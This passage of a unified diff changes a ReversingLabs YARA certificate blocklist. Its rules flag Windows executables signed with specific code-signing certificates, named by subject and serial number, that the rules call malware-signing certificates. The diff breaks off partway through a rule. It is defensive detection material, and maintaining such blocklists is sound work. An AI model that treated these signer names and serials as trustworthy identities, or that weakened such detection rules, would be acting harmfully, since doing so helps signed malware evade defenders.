 		quality = 90
 		tags = "INFO, FILE"
@@ -28493,21 +50887,21 @@ rule REVERSINGLABS_Cert_Blocklist_Fc7065Abf8303Fb472B8Af85918F5C24 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DIG IN VISION SP Z O O" and ( pe.signatures [ i ] . serial == "00:fc:70:65:ab:f8:30:3f:b4:72:b8:af:85:91:8f:5c:24" or pe.signatures [ i ] . serial == "fc:70:65:ab:f8:30:3f:b4:72:b8:af:85:91:8f:5c:24" ) and 1604361600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPSLTD PLYMOUTH LTD" and ( pe.signatures [ i ] . serial == "00:db:95:b2:23:62:d4:6a:73:c3:9e:0a:c9:24:88:3c:5b" or pe.signatures [ i ] . serial == "db:95:b2:23:62:d4:6a:73:c3:9e:0a:c9:24:88:3c:5b" ) and 1621296000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_698Ff388Adb50B88Afb832E76B0A0Ad1 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0C48732873Ac8Ccebaf8F0E1E8329Cec : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8a6f4a15-08a5-5ca5-a743-55075726e744"
+		id = "b531341a-e8ac-5b56-a202-3c072f5d2ce0"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16120-L16136"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10238-L10254"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b29bc69c8fd9543dba8f7d2a18d52b1bcbb8a8ae6f553d8b232ca74709b9addc"
+		logic_hash = "7c9476a4119e013c8bb3c14b607090d592feaa5f2fc0f78d810555681d4a3733"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28517,21 +50911,21 @@ rule REVERSINGLABS_Cert_Blocklist_698Ff388Adb50B88Afb832E76B0A0Ad1 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BELLAP LIMITED" and pe.signatures [ i ] . serial == "69:8f:f3:88:ad:b5:0b:88:af:b8:32:e7:6b:0a:0a:d1" and 1675070541 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hermetica Digital Ltd" and pe.signatures [ i ] . serial == "0c:48:73:28:73:ac:8c:ce:ba:f8:f0:e1:e8:32:9c:ec" and 1618272000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_391Ae38670Ab188A5De26E07 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_C51F4Cf4D82Bc920421E1Ad93E39D490 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "aca9ac98-1c3b-5231-b6e5-97e3b8fec6de"
+		id = "727aba82-c908-51a6-9f1f-7fd8df424d8c"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16138-L16154"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10256-L10274"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f7ccfadab650ae3b6f950c9d1b35f86aa4a4e6c05479c014ab18881a405678f0"
+		logic_hash = "cef717e7fe3eb0fb958d405caaf98fa51b22b150ccbf1286d3b4634e9df81ade"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28541,21 +50935,21 @@ rule REVERSINGLABS_Cert_Blocklist_391Ae38670Ab188A5De26E07 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DVERI FADO, TOV" and pe.signatures [ i ] . serial == "39:1a:e3:86:70:ab:18:8a:5d:e2:6e:07" and 1540832872 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CUT AHEAD LTD" and ( pe.signatures [ i ] . serial == "00:c5:1f:4c:f4:d8:2b:c9:20:42:1e:1a:d9:3e:39:d4:90" or pe.signatures [ i ] . serial == "c5:1f:4c:f4:d8:2b:c9:20:42:1e:1a:d9:3e:39:d4:90" ) and 1644624000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D08D83Ff118Df3777E371C5C482Cce7B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_C96086F1894E6420D2B4Bdeea834C4D7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5acd2e61-1c04-5cc5-8773-25856fc163c4"
+		id = "1268461b-676c-59b8-80c1-c54dbe1a265f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16156-L16174"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10276-L10294"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5fdaf01c6a23057ab976e3ad2a8b40558b16693161410b0f30d7b884de7e3985"
+		logic_hash = "949bbd41ad4c83a05c1f004786cd296e2af80a3a559955ec90a4675cdfa04258"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28565,21 +50959,21 @@ rule REVERSINGLABS_Cert_Blocklist_D08D83Ff118Df3777E371C5C482Cce7B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMO-K Limited Liability Company" and ( pe.signatures [ i ] . serial == "00:d0:8d:83:ff:11:8d:f3:77:7e:37:1c:5c:48:2c:ce:7b" or pe.signatures [ i ] . serial == "d0:8d:83:ff:11:8d:f3:77:7e:37:1c:5c:48:2c:ce:7b" ) and 1444780800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE FAITH SP Z O O" and ( pe.signatures [ i ] . serial == "00:c9:60:86:f1:89:4e:64:20:d2:b4:bd:ee:a8:34:c4:d7" or pe.signatures [ i ] . serial == "c9:60:86:f1:89:4e:64:20:d2:b4:bd:ee:a8:34:c4:d7" ) and 1644969600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_06Ce209477F1Ac19A2049Bdc5846A831 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_06Fa27A121Cc82230C3013Ee634B6C62 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "21c16e2c-bc0c-5e1d-bc44-6d7c4afc34cb"
+		id = "4520e544-7a41-5dde-b90b-46cf3349297c"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16176-L16192"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10296-L10312"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "24474c4033a8cad1690160da64b75a1eec570f56e830967256c19574bde59384"
+		logic_hash = "23ac7a97e7632536ed27cf9078b6bc1a734f1e991a20a228734b45117582f367"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28589,21 +50983,21 @@ rule REVERSINGLABS_Cert_Blocklist_06Ce209477F1Ac19A2049Bdc5846A831 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Select'Assistance Pro" and pe.signatures [ i ] . serial == "06:ce:20:94:77:f1:ac:19:a2:04:9b:dc:58:46:a8:31" and 1426710344 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zimmi Consulting Inc" and pe.signatures [ i ] . serial == "06:fa:27:a1:21:cc:82:23:0c:30:13:ee:63:4b:6c:62" and 1645142401 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_447F449121B883211663B7B7E2Ead868 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_9Dd3B2F7957Ba99F4B04Fcdbe03B7Aac : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a3ee3618-0e20-5d9c-a514-9020607bd1b0"
+		id = "25229478-e891-5e0a-b738-6ca1fdd0012c"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16194-L16210"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10314-L10332"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f473a939d1a27cf53c09d0e4a3753a9444ae3674a55d5b0feafeef6b75dd487f"
+		logic_hash = "d4f1b75dddd47fe8a19bd8e794b4930bdcaf54d63db57422db0a9b631d4f488d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28613,21 +51007,21 @@ rule REVERSINGLABS_Cert_Blocklist_447F449121B883211663B7B7E2Ead868 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3 AM CHP" and pe.signatures [ i ] . serial == "44:7f:44:91:21:b8:83:21:16:63:b7:b7:e2:ea:d8:68" and 1443052800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DOD MEDIA LIMITED" and ( pe.signatures [ i ] . serial == "00:9d:d3:b2:f7:95:7b:a9:9f:4b:04:fc:db:e0:3b:7a:ac" or pe.signatures [ i ] . serial == "9d:d3:b2:f7:95:7b:a9:9f:4b:04:fc:db:e0:3b:7a:ac" ) and 1646438400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6366A9Ac97Df4De17366943C9B291Aaa : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_061051Ff2A8Afab10347A6F1Ff08Ecb6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "77d6756b-e948-5771-9ec1-f5159b0e792c"
+		id = "4e23648f-9770-53ad-9c62-6e6239a02aa7"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16212-L16228"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10334-L10350"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "dcdfb78d4d779b1cabcdf5b2da1fa27aaa9faaed4d4967630ce45f30304fe227"
+		logic_hash = "db3ac3ee326c60e9abc94a2fb53d801637f044e7ab72d69e53958799e48747b7"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28637,21 +51031,21 @@ rule REVERSINGLABS_Cert_Blocklist_6366A9Ac97Df4De17366943C9B291Aaa : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "xlgames" and pe.signatures [ i ] . serial == "63:66:a9:ac:97:df:4d:e1:73:66:94:3c:9b:29:1a:aa" and 1326796477 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TACHOPARTS SP Z O O" and pe.signatures [ i ] . serial == "06:10:51:ff:2a:8a:fa:b1:03:47:a6:f1:ff:08:ec:b6" and 1606435200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_66E3F0B4459F15Ac7F2A2B44990Dd709 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Eda2429083Bfafb04E6E7Bdda1B08834 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2fc1303f-e559-59ba-a1b9-b74a154d8805"
+		id = "0f5852c4-7866-5e12-97e9-c73972def6c5"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16230-L16246"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10352-L10370"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a563f1485ae8887c46f45d1366f676894c7db55954671825b37372f786ce0d3d"
+		logic_hash = "4f7d5c6929fe364c8868fddb28dd7bbf7cdcf3896d57836466af1a538190d11c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28661,21 +51055,21 @@ rule REVERSINGLABS_Cert_Blocklist_66E3F0B4459F15Ac7F2A2B44990Dd709 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KOG Co., Ltd." and pe.signatures [ i ] . serial == "66:e3:f0:b4:45:9f:15:ac:7f:2a:2b:44:99:0d:d7:09" and 1320288125 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OWLNET LIMITED" and ( pe.signatures [ i ] . serial == "00:ed:a2:42:90:83:bf:af:b0:4e:6e:7b:dd:a1:b0:88:34" or pe.signatures [ i ] . serial == "ed:a2:42:90:83:bf:af:b0:4e:6e:7b:dd:a1:b0:88:34" ) and 1625011200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_610039D6349Ee531E4Caa3A65D100C7D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0A590154B5980E566314122987Dea548 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "de018b47-9fbd-590e-b3d1-b50029496718"
+		id = "fd2a2165-494b-5655-a322-73f033643c74"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16248-L16264"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10372-L10388"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e6b6a90cf40283d2e4d2d9c5732a078c9f2f117e3639ab5c0dd6c5323cb7c9ff"
+		logic_hash = "d5fdf2bc61fadf3e73bcf1695c48ebc465e614cdd2310f9e5f40648d9615afc4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28685,21 +51079,21 @@ rule REVERSINGLABS_Cert_Blocklist_610039D6349Ee531E4Caa3A65D100C7D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Wemade Entertainment" and pe.signatures [ i ] . serial == "61:00:39:d6:34:9e:e5:31:e4:ca:a3:a6:5d:10:0c:7d" and 1341792000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Maya logistika d.o.o." and pe.signatures [ i ] . serial == "0a:59:01:54:b5:98:0e:56:63:14:12:29:87:de:a5:48" and 1636416000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1Caa0D0Dadf32A2404A75195Ae47820A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_69A72F5591Ad78A0825Fbb9402Ab9543 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5c1f82a4-c64d-556c-8c7a-213582e7bd5a"
+		id = "938cdd31-433d-5df7-b00e-54a7e440810b"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16266-L16282"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10390-L10406"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ab71e485c0b541fae79d246d34b1f4fb146747c1c3fb723aa87a7a32378ff974"
+		logic_hash = "72ca07b7722f9506c5c42b5e58c5ce9b3a7d607164a5f265015769f2831cd588"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28709,21 +51103,21 @@ rule REVERSINGLABS_Cert_Blocklist_1Caa0D0Dadf32A2404A75195Ae47820A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LivePlex Corp" and pe.signatures [ i ] . serial == "1c:aa:0d:0d:ad:f3:2a:24:04:a7:51:95:ae:47:82:0a" and 1324425600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PUSH BANK LIMITED" and pe.signatures [ i ] . serial == "69:a7:2f:55:91:ad:78:a0:82:5f:bb:94:02:ab:95:43" and 1581811200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_140D2C515E8Ee9739Bb5F1B2637Dc478 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0883Db137021B51F3A2A08A76A4Bc066 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "69f3ee46-87d2-5630-ba7c-4ed2924cf650"
+		id = "792111be-7c8a-53f5-9ec3-e1f25f083666"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16284-L16300"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10408-L10424"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e6724fe80959592c8741621ce604518d3e964cee5941257a99dda78b9c8bbdac"
+		logic_hash = "5e3c8654169830790665992f5d7669d0ca6c1c8048580b3ae70331ad2a763a6c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28733,21 +51127,21 @@ rule REVERSINGLABS_Cert_Blocklist_140D2C515E8Ee9739Bb5F1B2637Dc478 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Guangzhou YuanLuo Technology Co.,Ltd" and pe.signatures [ i ] . serial == "14:0d:2c:51:5e:8e:e9:73:9b:b5:f1:b2:63:7d:c4:78" and 1386806400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Divertida Creative Limited" and pe.signatures [ i ] . serial == "08:83:db:13:70:21:b5:1f:3a:2a:08:a7:6a:4b:c0:66" and 1627430400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_58015Acd501Fc9C344264Eace2Ce5730 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2B921Aaaba777B5A99507196C6F1C46C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "28a56bcf-1f13-5478-a6d5-7595464da198"
+		id = "0cb5be9e-a0b7-5785-87f3-ad097d4ab479"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16302-L16318"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10426-L10442"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7c1bec5059d40fc326bb08775888ed169abc746228eeb42c897f479992c5acab"
+		logic_hash = "a00eb9837f7700d83862dff2077d85c68c24621d7aacf857b42587dc37976465"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28757,21 +51151,21 @@ rule REVERSINGLABS_Cert_Blocklist_58015Acd501Fc9C344264Eace2Ce5730 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Nanjing Ranyi Technology Co., Ltd. " and pe.signatures [ i ] . serial == "58:01:5a:cd:50:1f:c9:c3:44:26:4e:ac:e2:ce:57:30" and 1352246400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Python Software Foundation" and pe.signatures [ i ] . serial == "2b:92:1a:aa:ba:77:7b:5a:99:50:71:96:c6:f1:c4:6c" and 1648425600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0B7279068Beb15Ffe8060D2C56153C35 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0332D5C942869Bdcabf5A8266197Cd14 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "78bfa550-d85e-5776-a65d-ff0039abd2c4"
+		id = "b1c650bb-b53f-5cca-8cc2-4d3498285d31"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16320-L16336"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10444-L10460"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ca00f1adacd6ff16e54b85be38c3a4545a10c76548e0647f7f3f6cfa4dff412d"
+		logic_hash = "726ac44dd8109fcd0a9120f6c0673b8ecf7d5b3a4bb81976f48402e21502201a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28781,21 +51175,21 @@ rule REVERSINGLABS_Cert_Blocklist_0B7279068Beb15Ffe8060D2C56153C35 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Guangzhou YuanLuo Technology Co.,Ltd" and pe.signatures [ i ] . serial == "0b:72:79:06:8b:eb:15:ff:e8:06:0d:2c:56:15:3c:35" and 1350864000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JAWRO SP Z O O" and pe.signatures [ i ] . serial == "03:32:d5:c9:42:86:9b:dc:ab:f5:a8:26:61:97:cd:14" and 1622160000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Bc0F18Da36702E302Db170D91Dc9202 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4679C5398A279318365Fd77A84445699 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "977d9686-d811-5416-b090-d4f45d7935d0"
+		id = "8d1810e7-9b64-52b3-91c6-f03832d61d3a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16338-L16354"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10462-L10478"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d9ee2cf63a4edb28f894ea49a5b4df9b818d5764d9a74721b1d5222f53859462"
+		logic_hash = "bdb68be92b3ba6b5eaa6e8e963529c0b9213942ba2552c687496ad5d12d5b472"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28805,21 +51199,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Bc0F18Da36702E302Db170D91Dc9202 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Foresee Consulting Inc." and pe.signatures [ i ] . serial == "0b:c0:f1:8d:a3:67:02:e3:02:db:17:0d:91:dc:92:02" and 1637712000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HURT GROUP HOLDINGS LIMITED" and pe.signatures [ i ] . serial == "46:79:c5:39:8a:27:93:18:36:5f:d7:7a:84:44:56:99" and 1643846400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ca9B6F49B8B41204A174C751C73Dc393 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_101D6A5A29D9A77807553Ceac669D853 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d09658e4-44e4-5c10-a866-ba486000f1b6"
+		id = "918fa696-5c92-551b-a87b-6410a6dc718a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
